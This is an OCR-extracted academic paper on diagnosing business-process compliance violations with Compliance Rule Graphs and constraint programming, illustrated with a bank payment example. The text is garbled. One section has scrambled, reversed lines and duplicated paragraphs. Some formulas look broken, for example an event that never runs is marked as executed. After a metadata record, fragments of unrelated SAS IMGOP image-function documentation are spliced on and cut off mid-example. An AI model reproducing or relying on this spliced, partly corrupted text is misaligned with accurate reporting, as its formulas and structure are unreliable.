- Determining compliance-violating events. It enables fine-grained feedback and recovery to know not only the violated rules, but also the event or events that have provoked the fault.
- Determining the correct time interval where the responsible events for compliance violations should have occurred.
As it is possible that multiple instances of the same business process model can be involved in the same diagnosis process, we will also provide the necessary guidelines to enable the diagnosis of events for multiple instances collected in the same monitoring process.
The paper is organized as follows: Section II presents the compliance rule language based on graphs that we use to represent the activities temporal order relation. Also an example has been included in that section to facilitate the understanding. Section II-B analyses the necessity to determine the trace of events when multiple instances participate in the diagnosis. Section III describes how to model the compliance rules by means of numerical constraints. Section IV explains how model and compute the problem using model-based diagnosis theory to obtain the possible correct time intervals to satisfy the rules. In that section, the Constraint Programming paradigm is introduced, since it allows us to compute the diagnosis automatically depending on the observations. Section V analyses the main papers related to this work. Finally, conclusions and future work are also included in the document.
II. PRELIMINARIES
In this section we provide necessary background information. In particular, we introduce event and data context as necessary means for compliance analysis in a multiple instance setting.
A. Compliance Rule Description
Many languages have been proposed to describe compliance rules. Some of them will be analyzed in Section V. In order to facilitate the correct description of the compliance rules, it is necessary to take into account the complexity of the specification language. It must neither become an obstacle for constraint specification nor for the validation of processes against constraints. Thus, it is important to find an appropriate balance between expressiveness, formal foundation, and efficient analysis. The constraint specification language used in this paper is based on Compliance Rule Graphs (CRGs) [4]. We opted for CRGs since they provide a visual representation, enable the representation of common compliance rule patterns, and are particularly suited for compliance monitoring [6].
Basically, a CRG enables the graphical specification of a compliance rule \( c \) over a set of process activity types \( A \). Specifically, a node of the CRG maps to an activity type \( a \in A \) which could be presented in the processes which \( c \) is imposed on. In Figure 1, for example, the CRG reflecting compliance rule \( c_1 \) consists of nodes that map to activity types Payment run, Transfer to bank, and Check bank statement. A CRG always follows the structuring into to node sets reflecting the antecedent and consequence parts of the rule. The antecedent nodes of the CRG represent all activity types that trigger the associated compliance rule. The consequence nodes reflect the necessary consequences a compliance rule is imposing in case the compliance rule is met. For both, antecedent and consequence nodes, a further distinction is made into occurrence and absence nodes. Occurrence nodes reflect the presence of an activity type in the underlying process. Absence of certain activity types is expressed by absence nodes respectively. In Figure 1, Payment run is an antecedent occurrence node meaning that \( c_1 \) is triggered if an activity of type Payment run is present in a process. Transfer to bank and Check bank statement are consequence occurrence nodes reflecting that in case a Payment run has taken place, both of them have to happen afterwards. As it can be seen from this example, some order can be imposed on the nodes of the same type, i.e., antecedent and consequence. For example, Transfer to bank and Check bank statement have not only to be executed after Payment run has occurred regarding \( c_1 \), but also in this given order. Edges between antecedent and consequence nodes describe
\(^1\) and there is no conflict between compliance rules \( c_1 \) to \( c_4 \)
implication relations. On top of this control flow related structures, data extensions for CRGs exist [7].
In order to introduce how the rules can be described by means of CRGs, and explain how the model can be diagnosed, an example about bank transfers presented in [8] is used. Figure 1 depicts the example by means of the CRGs, whose description is:
- \( c_1 \): Conducting a payment run creates a payment list containing multiple items that must be transferred to the bank. Then, the bank statement must be checked for payment of the corresponding items.
- \( c_2 \): For payment runs with amount beyond 10,000 \( € \), the payment list has to be signed before being transferred to the bank and has to be filed afterwards for later audits.
- \( c_3 \): When payment of an open item is confirmed in the bank statement, the item has to be marked as cleared eventually.
- \( c_4 \): Once marked as cleared, the item must not be put on any payment list.
B. Diagnosis of Events for Multiple Instances: Data and Event Contexts
In this paper, we exploit the graphical notation of CRGs and translate them into a Constraint Satisfaction Problem later on.\(^2\) Anyway, the abstraction to the process will be the event trace. By an event we refer to the observable execution of an activity in a business process during monitoring. The event is defined for the tuple \( \langle \text{Time}, \text{Event Context} \rangle \), being \( \text{Time} \in \mathbb{R}^2 \). The Event Context becomes relevant for analyzing compliance in case of multiple instances and will be defined in the following.
Supposing that an event represents the execution of an activity in an instant, it is possible that the same activity would be executed several times in the same instance, or for several instances. For carrying out the diagnosis it is crucial to distinguish between both cases. For example, if two events \( e_1 \) and \( e_2 \) represent two executions of activity \textit{Payment run} for different instances, and another event \( e_3 \) occurs due to execution of activity \textit{Transfer to bank}, it would be necessary to know if the event \( e_3 \) is related to the event \( e_1 \) or \( e_2 \). This problem is related to the question which event model is uses. If all events are equipped with unique references to the instances they represent, the relation between events is more easy to determine. However, the existence of such unique references cannot be assumed for all application domains, particularly, if the events stem from heterogeneous sources [8]. Existing event models such as XES [9] typically equip events with time information and attributes. However, the definition of the event context to be used in associating events for later diagnosis has not explicitly been addressed. In these cases, the association between events has to be determined based on different information that enables establishing an association. A similar concept has been provided by correlation in BPEL [10]. Adopting the idea of correlating events to instances via data, we will exploit context, i.e., \textbf{Data Context} or \textbf{Event Context} that is shared between the events reflecting the underlying activity executions. In the following, we present the context model depicted in Figure 2: a compliance rule refers to a set of activities. As these activities are connected to process data, the compliance rule can be associated with a data context, that is reflected by the events occurring in the run of the activity executions. The latter is captured within the event context, reflecting all data contexts an event might refer to.

The data context of a compliance rule \( c \) is described by a set of pairs \( \langle \text{Name}, \text{type} \rangle \). In Figure 1, the data context associated to compliance rules \( c_1 \) or \( c_2 \) is \{\text{Payment list: string}\}, and for \( c_3 \) or \( c_4 \) the data context associated to each of them is \{\text{Payment list: string, Item: integer}\}. Although each compliance rule is only defined for one data context, and an activity can participate in more than one compliance rule, it is not possible that an activity is involved in two compliance rules defined for different data contexts. In Figure 3 the relation between data contexts (Payment and \{\text{Payment List, Item}\}), compliance rules and activities for the example is shown.
The event context of an event \( e \) is defined as the set of specific values of each event \( e \) for the data context of the activity that the event represents. Then, each event context is described by the triple \( \langle \text{activity, instantiation of the data context, list of information associated with the event} \rangle \), that represents the activity that was executed, the specific instantiation for the data context associated to the activity of the type specified in the data context, and optionally a data value if it is necessary for the compliance rules (as in the compliance rule \( c_2 \) of Figure 1).
An example of reception of events, where the time is represented by means of a number of seconds after a time reference, is:
- \( e_1 = (1584, \{\text{Payment run, } \{\text{Payment list: A}\}, \text{amount} = 60.000\}) \)
- \( e_2 = (2145, \{\text{Transfer to bank, } \{\text{Payment list: A}\}\}) \)
- \( e_3 = (2589, \{\text{Check bank statement, } \{\text{Payment list: A}\}\}) \)
- \( e_4 = (3256, \{\text{File payment list, } \{\text{Payment list: A}\}\}) \)
- \( e_5 = (3267, \{\text{Payment confirmed, } \{\text{Payment list: A, item: 1}\}\}) \)
\(^2\)The formal semantics of CRGs is based on First Order Logic. The abstraction of the processes is provided by using event traces.
A Data context
Definition 1 (Activity and Compliance Rule Cluster (dc): specific data context (A,
Payment confirmed
the activity
C
a set of activities. Then we define compliance rule cluster
Definition
Activity
Compliance
rule refers to not the data context.
but there the clustering was done based on the processes a
approach to cluster compliance rules was proposed in [10
compliance of multiple instances during runtime. Another
clusters it becomes possible to monitor and diagnose the
1
be clustered with respect to their data context (see Definition
A
Finally, compliance rules as well as process activities can
be clustered with respect to their data context (see Definition
1), i.e., the data they share and operate on. Based on such
clusters it becomes possible to monitor and diagnose the
compliance of multiple instances during runtime. Another
approach to cluster compliance rules was proposed in [11],
but there the clustering was done based on the processes a
time refers to not the data context.
For example, if an event \( e_j \) has an event context \( \langle \text{Payment confirmed, \{Payment list: A, Item: 2\}} \rangle \), it expresses that the activity \( \text{Payment confirmed} \) has been executed with the
specific data context \( \langle A, 2 \rangle \).
Finally, compliance rules as well as process activities can
be clustered with respect to their data context (see Definition
1), i.e., the data they share and operate on. Based on such
clusters it becomes possible to monitor and diagnose the
compliance of multiple instances during runtime. Another
approach to cluster compliance rules was proposed in [11],
but there the clustering was done based on the processes a
time refers to not the data context.
**Definition 1** (Activity and Compliance Rule Cluster (dc: Data Context)). Let \( C \) be a set of compliance rules and \( A \) a set of activities. Then we define compliance rule cluster \( C_{dc} \) and activity cluster \( A_{dc} \) based on data context \( dc \) as follows:
\[
C_{dc} := \{ c \in C \mid DataCtxt(c) = dc \}
\]
\[
A_{dc} := \{ a \in A \mid c defined \ over A \land DataCtxt(c) = dc \}
\]
It is not possible that two events of an activity during a
monitoring cycle have the same identifier for the event
context. For example, it is not possible that two events of the
activity \( \text{Payment run} \) have the identifier of context \( \{\text{Payment list: A}\} \) in the same cycle of monitoring, since it is necessary to
establish the trace of the events during the execution.
**III. DESCRIBING COMPLIANCE RULES BY MEANS OF
NUMERICAL CONSTRAINTS**
In order to carry out the model-based diagnosis, the
compliance rules and the events monitored need to be
included in the model to solve. As we aim at finding out
the possible correct time intervals for a malfunction, it is
necessary to use a model that permits to include numerical
aspects, such as numerical constraints to describe the time
instant of the event executions, not only the temporal order
relation between them.
**A. Modeling events by means of Numerical Constraints**
As it is introduced in the previous section, an event is
described by means of an instant, and an event context. It im-
plies that an observational model is described by a sequence
of events, ordered in function of the instant when they were
thrown \( \sigma = < e_1, \ldots, e_n > \) [12], and where this trace can
involve different instances of the same process model. In
this paper we assume that events are only represented by
means of an occurrence in an instant, not with a duration.
To diagnose a compliance rule violation in a business
process, it is necessary to model the executed events and the
events that can be executed in the future as well, to determine
possible non-compliances according to the compliance rules.
Obviously, it is not possible to know the events that will
be executed in the future, but we have some information
derived from the use of the compliance rules that describe
the model. For example, analysing the compliance rule \( c_4 \)
of the example, if an event related to the activity \( \text{Mark as} \)
cleared is executed, it is possible that an event for the activity Put on payment list will be executed in the future, although it is described as an incorrect behaviour of the process. In order to model the scenario to diagnose, the executed events and the non-executed events must be included as well, since they can be related by means of the different compliance rules that govern the process behaviour. For example, if activity \( A \) must be executed after activity \( B \), and an event about \( A \) was executed in the instant \( t_z \), to satisfy the compliance rule, an event of \( B \) has to be executed after the instant \( t_z \) and before the instance ends. As the event included in the model can represent events thrown in the past, or the events that can be executed in the future, we propose to include in the model-based diagnosis for each event (executed or not) a new variable associated to the timestamp, where the pair of variables \((\text{Executed}, \text{Time})\) represents if the event has been executed with the Boolean variable Executed, and the instant when it was executed with the numerical variable Time. Depending on the instant when an event is executed, both parameters \((\text{Executed} \text{ and Time})\) can take different values. It has to satisfy the following rules depending on the execution of each event:
- If the event \( e \) has been executed: \( \text{Executed} = true \land \text{Initial Time} \leq \text{Time} \leq \text{current Time} \) (\( \text{event}_i \) in Figure 4)
- If the event \( e \) has not been executed but will be executed in the future: \( \text{Executed} = true \land \text{Time} > \text{current Time} \) (\( \text{event}_j \) in Figure 4)
- If the event \( e \) has not been executed and will not be executed in the future: \( \text{Executed} = true \land \text{Time} = -1 \)

B. **Modeling Compliance Rule Graphs by means of Numerical Constraints**
In order to infer if an activity has been executed in an incorrect instant, according to a set of events, we propose to transform each CRG into a numerical constraint to be combined with the model of execution of events explained in the previous subsection. The inclusion of numerical aspects into compliance rule validation process enables proactive treatment of future violations. Each edge involved in the CRG is transformed into a numerical constraint to represent the time and temporal order execution of the activities. Following the possible patterns of relation that can exist for the components of a CRG, Figure 5 shows the transformation of each combination of nodes in a logical formula that will be included in the numerical model to diagnose the business process execution. In Figure 5, the execution of an activity \( A \) and the instant when it is executed are represented by means of the variables \( A_{Ex} \) and \( A_T \) respectively. The patterns put the constraints of antecedents before the implication operator ‘\( \rightarrow \)’, and the constraints of the consequences after it. The temporal order is represented related the variables \( A_T \) with the ‘\( < \)’ operator, and the occurrences and absences by means of the Boolean variables \( A_{Ex} \) for the different activities.
For the example of Section II, the constraints that describe the compliance rules according to the CRGs are:
- \( c_1: \) \( \text{PaymentRun}_{Ex} \rightarrow (\text{TransferToBank}_{Ex} \land \text{PaymentRun}_{T} < \text{TransferToBank}_{T}) \land (\text{CheckBankstatement}_{Ex} \land \text{TransferToBank}_{T} < \text{CheckBankstatement}_{T}) \)
- \( c_2: \) \( (\text{PaymentRun}_{Ex} \land \text{amount} > 10,000 \land \text{TransferToBank}_{Ex} < \text{PaymentRun}_{T} < \text{TransferToBank}_{T}) \rightarrow (\text{SignPaymentList}_{Ex} \land \text{SignPaymentList}_{T} < \text{TransferToBank}_{T}) \land (\text{FilePaymentList}_{Ex} \land \text{TransferToBank}_{T} < \text{FilePaymentList}_{T}) \)
- \( c_3: \) \( \text{PaymentConfirmed}_{Ex} \rightarrow \text{MarkAsCleared}_{Ex} \land \text{PaymentConfirmed}_{T} \land \text{MarkAsCleared}_{T} \)
- \( c_4: \) \( \text{MarkAsCleared}_{Ex} \rightarrow \neg (\text{PutOnPaymentList}_{Ex} \land \text{PutOnPaymentList}_{T} > \text{MarkAsCleared}_{T}) \)
These constraints are close to the model necessary to diagnose, but they are not exactly the same, since multiple instances have to be taken into account. The next sections present how to create the different diagnosis models depending on the observed events for several instances.
IV. **Creating Diagnosis Models for Several Instances**
Model-based diagnosis analysis is used to ascertain whether the behaviour of a system is correct or not, and who is the responsible of the malfunction. This identification is carried out by comparing the expected behaviour (the model) with the observed behaviour (the observational model). As in this paper we deal with the diagnosis of multiple instances of a process, where an activity can be executed more than once in each instance, it is necessary to introduce two types of diagnosis models, the static model that describes the compliance rules for any instance (as explained in Section III), and the dynamic models formed by the compliance rules for each instance found in the observational model, thereby related to the data contexts and event contexts.
For this reason, we extend the architecture presented in [8], including the necessary modules to create dynamic models according to the observational model to diagnose the incorrect events, and propose the event time execution intervals that make all the compliance rules satisfiable (Figure 6). Each dynamic model is automatically created and...
solved using constraint programming paradigm as explained in the following subsections.
A. Creating the Diagnosis Dynamic Models
As it was commented in Section II-B, our proposal allows the diagnosis of several instances included in the same observational model. It is related to the definition data contexts, that permits the differentiation of the different instances in a business process execution. Depending on the data contexts that exist for a set of events observed, the dynamic diagnosis models will be different. For each set of events, related between them to belong to the same data context, will be necessary to define compliance rules represented by means of numerical constraints that describe their relations. The compliance rules that describe the activities order relation will be used as a pattern for the different dynamic models that will be created in function of the observational model. In order to clarify the difference between static, observational and dynamic models, the following definitions are introduced:
Definition 2 (Static Diagnosis Model (SDM)). It is formed by:
- The activities \(\{a_1, \ldots, a_n\}\) of the business process.
- The compliance rules represented by numerical constraints \(\{c_1, \ldots, c_m\}\) following the patterns shown in Figure 5.
- The data contexts \(\{dc_1, \ldots, dc_f\}\).
- The activity clusters for each data context following Definition 1: \(A_{dc}(dc_1) \rightarrow \{a_1, \ldots, a_j\}, A_{dc}(dc_2) \rightarrow \ldots\)
- The compliance rule clusters for each data context following Definition 1: \(C_{dc}(dc_1) \rightarrow \{c_1, \ldots, c_j\}, C_{dc}(dc_2) \rightarrow \ldots\)
Definition 3 (Observational Model (OM)). The events \(\{e_1, \ldots, e_p\}\) that make visible the execution of the activities out of the process for the Compliance Monitoring layer (Figure 6). Each event is associated to one and only one activity, although an activity can be represented by several events. The observational model is also composed of the current time and the initial time for each instance.
Definition 4 (Dynamic Diagnosis Model (DDM)). It is created according to the SDM and the OM, then for the same SDM different DDM can be defined depending on the events involved in the cycle of monitoring. The DDM is formed by:
- The event contexts \(\{ec_1, \ldots, ec_d\}\) for the OM that are described by a tuple \(\langle dc, value\rangle\) where \(dc\) represents the data context and \(value\) represents the specific value of the data context. For the example of Section II, the event contexts obtained are: \(\{\langle Payment list, A\rangle, \langle (Payment list, Item), (A, 1)\rangle, \langle (Payment list, Item), (A, 2)\rangle, \langle (Payment list, Item), (A, 3)\rangle\}\).
- Being \(\{v_1, \ldots, v_n\}\) all the different values of a data context \(dc\) for an OM, for each value \(v_i \in \{v_1, \ldots, v_n\}\), a set of compliance rules associated to the data context \(dc\) is created \(\langle c_1^{v_i}, c_2^{v_i}, \ldots\rangle\). The variables that represent the execution of the activities and the timestamp, in the patterns shown in Figure 5, will be adjusted for the different values of the data contexts. Then, the variables of the numerical constraints will be \(A_{Ex}^{value}\) and \(A_T^{value}\) that represent the execution of the activity \(A\) in an event context with a specific value.
- \(A_{Ex}^{value}\) and \(A_T^{value}\) are also related by means of the constraint: \((A_{Ex}^{value} \land InitialTime \leq A_T^{value} \leq currentTime) \lor (A_{Ex}^{value} \land currentTime < A_T^{value}) \lor (\neg A_{Ex}^{value} \land currentTime = -1)\).
The constraints of the compliance rules for the DDM of the example of Section II for the events \( \{ e_1, \ldots, e_{10} \} \) are:
- Compliance rules for the Data Context \( \text{Payment list} \) for the value \( A \):
- \( c^1_A: \text{PaymentRun}^A_{Ex} \rightarrow (\text{TransferToBank}^A_{Ex} \wedge \text{PaymentRun}^A_T \wedge \text{CheckBankstatement}^A_{Ex} \wedge \text{TransferToBank}^A_T < \text{CheckBankstatement}^A_T) \)
- \( c^2_A: (\text{PaymentRun}^A_{Ex} \wedge \text{amount} > 10,000 \wedge \text{TransferToBank}^A_{Ex} \wedge \text{PaymentRun}^A_T < \text{SignPaymentList}^A_T \rightarrow \text{TransferToBank}^A_T \wedge \text{SignPaymentList}^A_T < \text{TransferToBank}^A_T) \)
- Compliance rules for the Data Context \( \text{(Payment list, Item)} \) for the value \( (A, 1) \):
- \( c^1_{A, 1}: \text{PaymentConfirmed}^A_{Ex} \rightarrow \text{MarkAsCleared}^A_{Ex} \wedge \text{PaymentConfirmed}^A_T \wedge \text{MarkAsCleared}^A_T \)
- \( c^2_{A, 1}: \text{MarkAsCleared}^A_{Ex} \rightarrow \neg (\text{PutOnPaymentList}^A_{Ex} \wedge \text{PutOnPaymentList}^A_T > \text{MarkAsCleared}^A_T) \)
- Compliance rules for the Data Context \( \text{(Payment list, Item)} \) for the value \( (A, 2) \):
- \( c^1_{A, 2}: \text{PaymentConfirmed}^A_{Ex} \rightarrow \text{MarkAsCleared}^A_{Ex} \wedge \text{PaymentConfirmed}^A_T \wedge \text{MarkAsCleared}^A_T \)
- \( c^2_{A, 2}: \ldots \)
- Compliance rules for the Data Context \( \text{(Payment list, Item)} \) for the value \( (A, 3) \):
- \( c^1_{A, 3}: \ldots \)
B. Solving Diagnosis Models by means of Constraint Programming
The DDM and the OM determine the necessary compliance rules to describe the instance-executions, but this model needs to be transformed into a computable model to be diagnosed. For this reason, we propose the use of Constraint Programming (CP) paradigm [13], building and solving Constraint Satisfaction Problems (CSP) automatically from the DDM. The use of CP permits the combination of numerical and Boolean variables to represent the model and deduce the incorrect events and the possible correct time intervals where they should have been executed.
The CSPs represent a reasoning methodology consisting of a model a problem formed by variables, domains and constraints. Formally, it is defined as a triple \( (X, D, C) \) where \( X = \{ x_1, x_2, \ldots, x_n \} \) is a finite set of variables, \( D = \{ d(x_1), d(x_2), \ldots, d(x_n) \} \) is a set of domains of the values of the variables, and \( C = \{ C_1, C_2, \ldots, C_m \} \) is a set of constraints. A constraint \( C_i = (V_i, R_i) \) specifies the possible values of the variables in \( V \) simultaneously to satisfy \( R \). Usually, to solve a CSP, a combination of search and consistency techniques is used [14]. The consistency techniques remove non-compliance values from the domains of the variables during or before the search. Several local consistency and optimization techniques have been proposed as ways of improving the efficiency of search algorithms, being especially optimized for linear problem. CP is an area in continuous evolution, with important commercial tools and an active research.
In order to compute the DDM, we propose to model a CSP where:
- \( X \) is formed by all the variables \( A^v_{Ex} \) and \( A^v_T \) that
represent the execution of each activity (execution and time) that are necessary to represent the instances.
- \( D \) is defined as Boolean for the variables \( A_{value}^{Ex} \), and Integer for the variables \( A_{value}^{Tr} \). \( A_{value}^{Tr} \) is represented by means of the absolute number of seconds or milliseconds (depending on the necessary granularity in each problem) that have elapsed since midnight, January 1, 1970, the typical time reference used in the libraries of some programming languages (for example \( \text{System.currentTimeMillis} \) in Java).
- \( C \) is the set of compliance rules represented by means of constraints derived from the OM as explained in Definition 4. These compliance rules are defined over the variables \( A_{value}^{Ex} \) and \( A_{value}^{Tr} \). Moreover, it is necessary to assign the values of the observed events to the variables \( A_{value}^{Ex} \), \( A_{value}^{Tr} \), initial time and current time.
If there is a tuple of values for the variables \( X \) in the domain \( D \), where all the constraints \( C \) are satisfiable, the CSP solver will return a tuple with the possible values of \( X \), then we can assure that the compliance rules are satisfiable for the OM. The problem is if there is no a tuple of values where the set \( C \) is satisfiable, we would not have information about the malfunction, only that, at least, one event is incorrect. We propose to find out the minimal non-compliance subset of events that explain the malfunction. This is equivalent to maximize the number of events that were thrown in a correct instant. In order to understand how we can model the CSP to obtain that, two notions need to be introduced: Reified Constraints and Constraint Optimization Problems.
A reified constraint consists of a constraint associated to a Boolean variable which denotes its truth value. The diagnosis that we propose is centered in the detection of incorrect instant of event execution, then it is possible that the assignment of an instant to an event \( A_{value}^{Tr} \) will be incorrect. For this reason, in the CSP we do not associate mandatorily to each \( A_{value}^{Tr} \) the timestamp where it was executed, then we associate a Boolean variable to each assignment of a specific value to each variable \( A_{value}^{Ex} \). Being the objective to maximize the number of events that occurs when the Compliance Monitoring layer describes. As the objective is to maximize the number of reified variables that are true, then an objective function is necessary. When an objective function \( f \) has to be optimized (maximized or minimized), then a Constraint Optimization Problem (COP) is used, which is a CSP and an objective function \( f \). A COP modelled to find the assignment of reified constraints is called maximal Constraint Satisfaction Problem (Max-CSP), A Max-CSP consists of finding out a total assignment which satisfies the maximum number of constraints. Max-CSP is an NP-hard problem and generally is more complex to solve than a CSP. The basic complete method for solving this problem was designed by Wallace [15].
have already been used in model-based diagnosis [16], although never for business processes. Different algorithms have been proposed in order to improve the obtaining of all minimal unsatisfiable subsets using notions of independence of constraints and incremental constraint solvers [17] and structural analysis [18].
For our model-based diagnosis, the objective function to maximize is \( \{rf_1 + \ldots + rf_n\} \), where each \( rf_i \in \{rf_1, \ldots, rf_n\} \) represents a reified constraint for each event of the OM. The CSP solver finds out the minimum combination of incorrect events that explain the malfunction and the correct time intervals for incorrect events. The COP obtained after the transformation of the DDM for the previous example is shown in Table 1.
C. Results for the example
For the example, if the diagnosis process is executed after the event \( e_{10} \) is thrown, the set of intervals obtained by means of our proposal is:
- To execute Check bank statement activity of Payment list A between [2146..instance ends]
- To execute Sign payment list of Payment list A between [1585..2144]
- To execute File payment list of Payment list A between [2146..instance ends]
- To execute Marked as cleared of \{Payment list A, Item 1\} between [3268..instance ends]
V. RELATED WORK
There are many proposals that use the compliance rules and monitoring of events to verify the correctness of a business process instance [19], [5], [8]. The different solutions depend on the compliance rule language used to describe the model. In order to describe the compliance rules, several languages have been proposed to describe declaratively the ordering and temporal relations between activities in the business processes. Independently of the language, the common idea of declarative business process modeling is that a process is seen as a trajectory in a state space and that declarative constraints are used to define the valid movements in that state space [20]. The differences between declarative process languages are centered in the different perception of what is an state. Some examples are the case handling paradigm [21], the constraint specification framework [22], the ConDec language [23], the PENELlope language [24], or EM-BrA²CE [25]. These languages use different knowledge representation paradigms, that enable different types of compliance rule verification. For instance, the ConDec language is expressed in Linear Temporal Logic (LTL) whereas the PENELope language is expressed in terms of the Event Calculus.
Linear Temporal Logic (LTL) expressions can be used to represent desirable or undesirable patterns. LTL formula can
be evaluated by obtaining an automaton that is equivalent to the formula and checking whether a path corresponds to the automaton. Unfortunately the use of automaton does not allow to infer the correct time intervals even before the compliance rules are activated. It is due to our proposal does not only analyse the compliance rules activated because the antecedent was occurred. We include the whole model in the diagnosis process as in [26], but with the difference that in this case a declarative language in used instead of an imperative language. The Event Calculus [27] is a first-order logic programming formalism that represents the time-varying nature of facts, the events that have taken place at given time points and the effect that these events reflect on the state of the system. Although one of the advantages of the use of event calculus is the ability to deductively reason about the effects of the occurrence of events and, more important is the abductive reasoning to discover a hypothesis about the malfunction to explain the evidence of events. But it does not have the capacity to propose a new set of data (events in this case) to avoid this malfunction, inferring errors in the future.
To the best of our knowledge there are no proposals that provide the correct time intervals of the events monitored in a business process for several instances, even before the compliance rules are violated.
VI. CONCLUSIONS AND FUTURE WORKS
We have presented a framework to diagnose, even before the compliance rules are violated, the non-conformity of the set of temporal events in accordance to the compliance rules that describe the behaviour of a business process. The diagnosis method that we propose, creates the necessary dynamic models depending on the events analysed and the possible events that could be executed in the future. It permits the diagnosis of errors even before they occur. The diagnosis and prognosis not only determine the incorrect event, but find out the possible time intervals where the events should have been executed to satisfy all the compliance rules. It can be used at run time during instance-executions, or as a post-mortem process to prevent failures in future instances. As future work we plan to use this framework to detect possible patterns of malfunctions, for example, that an activity is frequently executed later. Also we think that can be interesting to apply our proposal to other declarative languages that permit the description of other types of relations between activities.
ACKNOWLEDGMENT
The work presented in this paper has been partly funded by the Austrian Science Fund (FWF):I743, the Ministry of Science and...
Technology of Spain (TIN2009-13714) and the European Regional Development Fund (ERDF/FEDER).
REFERENCES
|
{"Source-Url": "http://eprints.cs.univie.ac.at/3753/1/GGR_MRIBP2013.pdf", "len_cl100k_base": 9428, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 40506, "total-output-tokens": 12109, "length": "2e13", "weborganizer": {"__label__adult": 0.00038504600524902344, "__label__art_design": 0.0006146430969238281, "__label__crime_law": 0.0007343292236328125, "__label__education_jobs": 0.0028839111328125, "__label__entertainment": 0.00011622905731201172, "__label__fashion_beauty": 0.00022411346435546875, "__label__finance_business": 0.004261016845703125, "__label__food_dining": 0.0005373954772949219, "__label__games": 0.0007567405700683594, "__label__hardware": 0.0009851455688476562, "__label__health": 0.0008935928344726562, "__label__history": 0.0003407001495361328, "__label__home_hobbies": 0.0001659393310546875, "__label__industrial": 0.0011224746704101562, "__label__literature": 0.00046372413635253906, "__label__politics": 0.0003972053527832031, "__label__religion": 0.0003597736358642578, "__label__science_tech": 0.1624755859375, "__label__social_life": 0.0001310110092163086, "__label__software": 0.027740478515625, "__label__software_dev": 0.79345703125, "__label__sports_fitness": 0.00024044513702392575, "__label__transportation": 0.0007443428039550781, "__label__travel": 0.0002073049545288086}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47177, 0.01967]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47177, 0.5778]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47177, 0.90537]], "google_gemma-3-12b-it_contains_pii": [[0, 4781, false], [4781, 10475, null], [10475, 16287, null], [16287, 20430, null], [20430, 26187, null], [26187, 29846, null], [29846, 33189, null], [33189, 38997, null], [38997, 41684, null], [41684, 47177, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4781, true], [4781, 10475, null], [10475, 16287, null], [16287, 20430, null], [20430, 26187, null], [26187, 29846, null], [29846, 33189, null], [33189, 38997, null], [38997, 41684, null], [41684, 47177, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 47177, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47177, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47177, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47177, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47177, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47177, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47177, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47177, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47177, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47177, null]], "pdf_page_numbers": [[0, 4781, 1], [4781, 10475, 2], [10475, 16287, 3], [16287, 20430, 4], [20430, 26187, 5], [26187, 29846, 6], [29846, 33189, 7], [33189, 38997, 8], [38997, 41684, 9], [41684, 47177, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47177, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-01
|
2024-12-01
|
1a85d35a7b09a46af78a53d6feb5e5ebf9f2cdc1
|
CONVERT
Converts an image to the specified image type and depth
Syntax
rc = IMGOP(task-id, 'CONVERT', type);
type
specifies the type of image to convert to:
'GRAY'
a monochrome (black and white) image
'CMAP'
a color-mapped image
'RGBA'
an RGB image
Type: Character
Details
CONVERT performs dithering, quantizing, and other operations in order to reduce an image to a simpler form. It can also create a two-color (black and white) RGB image by converting a monochrome image to an RGBA image. Images that are originally gray-scale or black and white cannot be colorized. CONVERT acts on the currently selected image or on a specified image.
Example
Convert an RGB image to a dithered monochrome image:
```
rc=imgop(task-id,'READ','rgb.tif');
rc=imgop(task-id,'CONVERT','GRAY');
rc=imgop(task-id,'WRITE','gray.tif');
```
Convert the GRAY image back to RGB. Because all color information is lost, the final RGB image has only two colors:
```
rc=imgop(task-id,'READ','gray.tif');
rc=imgop(task-id,'CONVERT','RGBA');
rc=imgop(task-id,'WRITE','rgb.tif');
```
COPY
Copies an image
Syntax
```
rc=IMGOP(task-id,'COPY',source-image-id
<, destination-image-id>);
```
**source-image-id**
is the identifier of the image to copy.
Type: Numeric
**destination-image-id**
is the new identifier of the copied image.
Type: Numeric
Details
COPY copies an image from source-image-id to destination-image-id. That is, it assigns another image identifier to an image. If destination-image-id is not specified, it copies to the currently selected image. The copied image is not automatically displayed.
Example
Simulate zooming and unzooming an image:
```
path=lnamemk(5,'sashelp.imagapp.gkids','format=cat');
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ_PASTE',1,1,path);
if (zoom eq 1) then
```
CREATE_IMAGE
Creates a new image that is stored in memory
---------
Syntax
rc=IMGOP(task-id,'CREATE_IMAGE',width,height,
type, depth<,color-map-len>);
width
is the width of the new image in pixels.
Type: Numeric
height
is the height of new image in pixels.
Type: Numeric
type
is the type of the image. These values match the values that QUERYN returns for type:
1 specifies a GRAY image (1-bit depth)
2 specifies a CMAP image 8-bit depth)
3 specifies an RGB image (24-bit depth)
Type: Numeric
depth
is the depth of the new image. In Version 7, the depth must match the value given for type, above.
Type: Numeric
color-map-len
is the number of colors in the color map. This value is used only with a type of 2 (CMAP). If not specified, it defaults to 256.
Details
CREATE_IMAGE creates an “empty” image in which all data and color map values are set to 0 (black). You must use SET_COLORS to set the color map and SET_PIXEL to set the pixel values. Note that processing an entire image in this manner can be very slow.
Example
